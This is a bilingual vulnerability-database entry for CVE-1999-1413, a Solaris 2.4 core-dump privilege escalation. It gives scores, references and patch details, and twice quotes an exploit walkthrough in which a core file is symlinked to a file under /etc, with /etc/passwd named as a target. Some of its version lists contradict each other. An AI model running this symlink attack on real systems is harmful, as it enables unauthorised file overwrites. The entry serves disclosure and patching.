CVE-1999-1413
CVSS4.6
发布时间 :1996-08-03 00:00:00
修订时间 :2016-10-17 22:04:15
NMCOES    

[原文]Solaris 2.4 before kernel jumbo patch -35 allows set-gid programs to dump core even if the real user id is not in the set-gid group, which allows local users to overwrite or create files at higher privileges by causing a core dump, e.g. through dmesg.


[CNNVD]Solaris Coredump漏洞(CNNVD-199608-002)

        kernel jumbo patch -35版本之前的Solaris 2.4存在漏洞,使得即使不在set-gid组中的用户也可以使用set-grid的程序进行存储器信息转储,本地用户利用该漏洞以更高的权限重写或新建文件,造成存储器信息转储,(如通过dmesg)。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.4::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1413
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1413
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199608-002
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=87602167419549&w=2
(UNKNOWN)  BUGTRAQ  19960803 Exploiting Zolaris 2.4 ?? :)
http://www.securityfocus.com/bid/296
(VENDOR_ADVISORY)  BID  296

- 漏洞信息

Solaris Coredump漏洞
中危 其他
1996-08-03 00:00:00 2005-10-20 00:00:00
本地  
        kernel jumbo patch -35版本之前的Solaris 2.4存在漏洞,使得即使不在set-gid组中的用户也可以使用set-grid的程序进行存储器信息转储,本地用户利用该漏洞以更高的权限重写或新建文件,造成存储器信息转储,(如通过dmesg)。

- 公告与补丁

        On Solaris 2.4 systems with kernel jumbo patch -35 or later set-gid programs will not core dump, unless you're in the group the program is set-gid too. Later revisions of Solaris (2.5 and up) are not thought to be vulnerable to this problem.
        Patches are available to all Sun customers at http://sunsolve.sun.com
        
         Sun Solaris 2.4 _x86
        

  •          Sun 101946-35 x86
            
            

  •         
            

        
        
         Sun Solaris 2.4
        

  •          Sun 101945-35 sparc
            
            

  •         
            

- 漏洞信息 (19236)

Solaris <= 7.0 Coredump Vulnerbility (EDBID:19236)
solaris remote
1996-08-03 Verified
0 Jungseok Roh
N/A [点击下载]
source: http://www.securityfocus.com/bid/296/info

There is a vulnerability in the way Solaris 2.4 pre Jumbo Kernel Patch -35 (for SPARC) dumps core files. Under normal operation the operating system writes out a core image of a process when it is terminated due to the receipt of some signals. The core image is called core and is written in the process's working directory (provided it can be; normal access controls apply). A process with an effective user ID different from the real user ID will not produce a core image.

The problem in this instance is that because certian directories under Solaris 2.4 are 'group bin' writable you can force programs which are in the bin group to dump core. Then by using a symlink attack you can overwrite files in directories owned by bin. A series of system critical directories under Solaris 2.4 are writable by group bin.

What follows is an example attack, slightly modified from the origanal Bugtraq posting.

[cosmos:beren] uname -a
SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
[cosmos:beren] ls -ald /etc
$)C
8 drwxrwxr-x 25 root sys 3584 7 ?y 25 @O 18:46 /etc/
[cosmos:beren] ls -ald /usr
2 drwxrwxr-x 30 root sys 1024 7 ?y 5 @O 17:26 /usr/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 ?y 18 @O 03:38 /usr/sbin/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 ?y 18 @O 03:38 /usr/sbin/

*NOTE* These directories are group bin writable.

[cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) ls

*NOTE* Here we look for programs which are in group bin so we can force them to dump core.

[cosmos:beren] ls -al /usr/sbin/dmesg
12 -r-xr-sr-x 1 bin sys 5520 1994 Jul 15 /usr/sbin/dmesg*

*NOTE* Here we identify dmesg(8) as being in the 'bin' group.

[cosmos:beren] ln -s /etc/SOMETHING core
[cosmos:beren] stty ^\^[cosmos:beren] pwd
/tmp
[cosmos:beren] dmesg
/* then slightly after u type this command kill it . using stty ^\^ there comes the following results */
^C (Core dumped)
[comos:beren] ls /etc/SOMETHING
SOMETHING


*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd. 
		

- 漏洞信息

8672
Solaris Unprivileged User Core Dump Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1996-08-03 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Solaris Coredump Vulnerbility
Access Validation Error 296
No Yes
1996-08-03 12:00:00 2009-07-11 12:16:00
This vulnerabilty was posted to the Bugtraq mailing list by Jungseok Roh <beren@cosmos.kaist.ac.kr> Sat, 3 Aug 1996.

- 受影响的程序版本

Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5

- 不受影响的程序版本

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5

- 漏洞讨论

There is a vulnerability in the way Solaris 2.4 pre Jumbo Kernel Patch -35 (for SPARC) dumps core files. Under normal operation the operating system writes out a core image of a process when it is terminated due to the receipt of some signals. The core image is called core and is written in the process's working directory (provided it can be; normal access controls apply). A process with an effective user ID different from the real user ID will not produce a core image.

The problem in this instance is that because certian directories under Solaris 2.4 are 'group bin' writable you can force programs which are in the bin group to dump core. Then by using a symlink attack you can overwrite files in directories owned by bin. A series of system critical directories under Solaris 2.4 are writable by group bin.

- 漏洞利用

What follows is an example attack, slightly modified from the origanal Bugtraq posting.

[cosmos:beren] uname -a
SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
[cosmos:beren] ls -ald /etc
$)C
8 drwxrwxr-x 25 root sys 3584 7 ?y 25 @O 18:46 /etc/
[cosmos:beren] ls -ald /usr
2 drwxrwxr-x 30 root sys 1024 7 ?y 5 @O 17:26 /usr/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 ?y 18 @O 03:38 /usr/sbin/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 ?y 18 @O 03:38 /usr/sbin/

*NOTE* These directories are group bin writable.

[cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) ls

*NOTE* Here we look for programs which are in group bin so we can force them to dump core.

[cosmos:beren] ls -al /usr/sbin/dmesg
12 -r-xr-sr-x 1 bin sys 5520 1994 Jul 15 /usr/sbin/dmesg*

*NOTE* Here we identify dmesg(8) as being in the 'bin' group.

[cosmos:beren] ln -s /etc/SOMETHING core
[cosmos:beren] stty ^\^[cosmos:beren] pwd
/tmp
[cosmos:beren] dmesg
/* then slightly after u type this command kill it . using stty ^\^ there comes the following results */
^C (Core dumped)
[comos:beren] ls /etc/SOMETHING
SOMETHING


*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd.

- 解决方案

On Solaris 2.4 systems with kernel jumbo patch -35 or later set-gid programs will not core dump, unless you're in the group the program is set-gid too. Later revisions of Solaris (2.5 and up) are not thought to be vulnerable to this problem.

Patches are available to all Sun customers at http://sunsolve.sun.com


Sun Solaris 2.4_x86

Sun Solaris 2.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站